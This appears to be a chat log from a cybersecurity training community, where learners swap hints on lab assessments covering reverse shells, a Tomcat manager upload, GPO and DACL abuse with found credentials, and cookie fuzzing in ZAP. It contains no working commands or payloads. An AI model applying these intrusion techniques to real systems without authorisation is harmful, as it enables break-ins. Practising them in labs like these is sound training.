Haii quick question. Who can teach me to hack ethically for free?
it's not different network segment
it just a script somewhere trying to reach to this specific machine
Im at the skills assessment on shells & payloads. Everything is sooooo slow is that 'normal' or expected or is something messed up just for me? Getting a call back from a shell takes like 5 minutes and running a single command takes forever so have to kill the shell and get a new one. If anyone has any tips for making things run smoother, I'm happy to hear.
The user you're trying to ping is busy please do not ping them
Change the VPN region and then try again
Hello, someone who would drop a nudge for the second flag on DACL II assessment lab?
I see a clear GPO Abuse attack path, have Angel creds but missing Manuel ones
Yeah, this is the point they wanted to drive though imo
Hey im doing the skill assessment 1 in attacking common applications i found an apache tomcat server running with a version vulnerable but i cant seem to login as /manager to upload a file and get a rev shell like earlier in walk through any help
Look for vulnerabilities based on the version
Skills Assessment - Using Web Proxies
I was doing Q3. Used command line to create a file list of cookie strings, because I didn't see one of these encodings in ZAP and ran it. Seeing that the request size was lower than the original request but always the same, I assumed there is an issue with my process.
Then, I push F5 on the website and there it is a flag. How did it get there? Should I somehow identify that I already succeeded in ZAP itself?
Feels a wee bit like I didn't earn this one.
Well any explanation would be a spoiler. BUT, iirc it explicitly stated that there's a chance for the flag to appear no?
I don't believe so, besides why would module be designed in such way that it answers randomly possibly the hardest question there
